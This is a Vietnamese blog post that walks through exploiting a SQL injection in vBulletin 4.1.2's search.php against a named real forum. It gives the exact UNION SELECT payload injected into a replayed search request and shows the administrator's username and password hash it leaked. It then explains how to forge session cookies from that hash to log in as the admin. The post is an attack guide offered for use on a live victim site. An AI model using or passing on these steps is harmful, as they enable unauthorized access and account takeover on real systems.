8 thg 7, 2012
[Exploits]vbb 4.1.2(search.php)-Superkhung
[Exploits]vbb 4.1.2(search.php)-Superkhungok mình bik đa số người bik về exploits này nhưng mình viết đại cho vui
trước tiên chúng ta cần add-on trong firefox
PHP Code:
Live Http Header
và
PHP Code:
cookies manager+ 1.5.1
ok chúng ta cần tìm 1 victim
Victim:http://www.tennisvn.net <= vbb 4.1.2
có nhiều người hỏi vậy sao check nó version nhiêu
1/thêm admincp như link http://www.tennisvn.net/admincp/ và mình nhìn vào có chữ vBulletin 4.1.2 Admin Control Panevậy là version 4.1.2 rùi
2/view page source và chúng ta nhìn vào
PHP Code:
<meta name="generator" content="vBulletin 4.1.2" />
vậy là bik rùi
ok chúng ta bắt đầu cuộc hành trình
1/chúng ta cần register nick để vào dc group nó và thế ta vào group.php của nó như
This image has been resized.Click to view original image
và mình sẽ chọn group tennis Xì TEEN đễ bug :d
2/tiếp ta vào search.php của nó
mình tick cái groups của nó và keywords viết là (tên group) tennis Xì TEEN
lưu ý nên bật Live Http Header nhé
ok search nào
3/ sẽ ra group đó và chúng ta mỡ cái live http header ra và bạn kéo lên để kiếm cái
PHP Code:
http://www.tennisvn.net/search.php?do=process
và kiếm từ Content-Length: 272
click bên dưới nó và chọn Replay
và tiếp thêm code vào
PHP Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,0x3a,password) FROM user WHERE userid=1#
This image has been resized.Click to view original image
và click replay và trở lại web victim
chúng ta nhìn vào
Search:
Type: Groups; Keyword(s): tennis, TEEN; : Uncategorized, admin::9a5920bf6c717bb142ceb95566c82234
nay ta có username+password nó rùi nhé
PHP Code:
admin::9a5920bf6c717bb142ceb95566c82234
9a5920bf6c717bb142ceb95566c82234<=MD5 nhưng đây ta chả cần giải nó bỏ vào
http://md5crack.com/
và bỏ pass đó vào generate MD5 HAsh
nó sẽ ra
PHP Code:
de399e3474d6570b92d46eb00dc5c184
4/ vậy là xong get user+pass của userid=1=admin rùi nhé
tiếp ta log off forum
bật cookie manager ở tools
mình click add
và ghi
Name:bb_userid
content:1
host:tennisvn.net
path:/
tiếp như trên nhé nhưng bên đây có tí thay đổi là
Name:bb_password
content:pass mới generate trên md5crack.com
ok click save giờ restart lại victim
và nó sẽ ra
This image has been resized.Click to view original image
Không có nhận xét nào:
Đăng nhận xét